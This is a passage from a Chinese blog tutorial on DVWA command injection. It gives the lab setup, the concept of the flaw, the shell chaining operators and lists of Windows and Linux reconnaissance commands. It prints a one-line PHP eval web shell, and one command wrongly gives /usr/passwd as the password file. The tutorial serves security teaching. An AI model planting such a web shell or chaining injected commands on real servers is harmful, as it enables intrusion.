DVWA(二)命令执行漏洞(Command Injection)

命令执行漏洞

 

一、实验环境 

二、实验原理

1.概念

2.分类

3.&&和&和|

4.Windows常用命令

5.Linux常用命令

三、实验步骤

(一)Low级别

1.源码

2.命令执行漏洞利用

(二)Medium级别

1.源码

2.命令执行漏洞利用

3.绕过方式

(三)High级别

1.源码

2.命令执行漏洞

3.绕过方法

(四)Impossible级别


一、实验环境 

  1.靶机:Windows Server 2003(192.168.10.111)

2.测试机:Windows 10

2.测试机:Windows 10

二、实验原理

1.概念

  • 命令执行漏洞,指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的
  • 属于高危漏洞之一,也属于代码执行的范围内
  • 一句话木马
<?php @eval($_POST['cmd']);?>

2.分类

  • 代码过滤不严或无过滤
  • 系统漏洞造成的命令执行,如:bash破壳漏洞(该漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会影响到bash交互的多种应用,如http,ssh,dhcp等)
  • 调用第三方组件,如:php(system(),shell_exec(),exec(),eval())、java(strust2)、thinkphp(老牌的PHP框架)

3.&&和&和|

  • &&   command1 && command2   (1正确,执行1和2)
  • &     command1   &  command2   (1无论正确与否,都执行2及正确的1)
  •  |      command1   |   command2   (1正确,只执行2)

4.Windows常用命令

  • dir   路径文件
  • ipconfig   网卡
  • cacl   计算器
  • regedit   注册表
  • arp -a   arp表
  • netstat -ano   端口信息

5.Linux常用命令

  • cat /usr/passwd   密码文件
  • cat /etc/group   所有组文件
  • id   当前用户的uid,gid以及所在组
  • groups   当前用户所在组
  • whoami—>pwd—>uname -a
  • netstat -pantu   端口信息
  • netstat -nr   路由表及网关
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值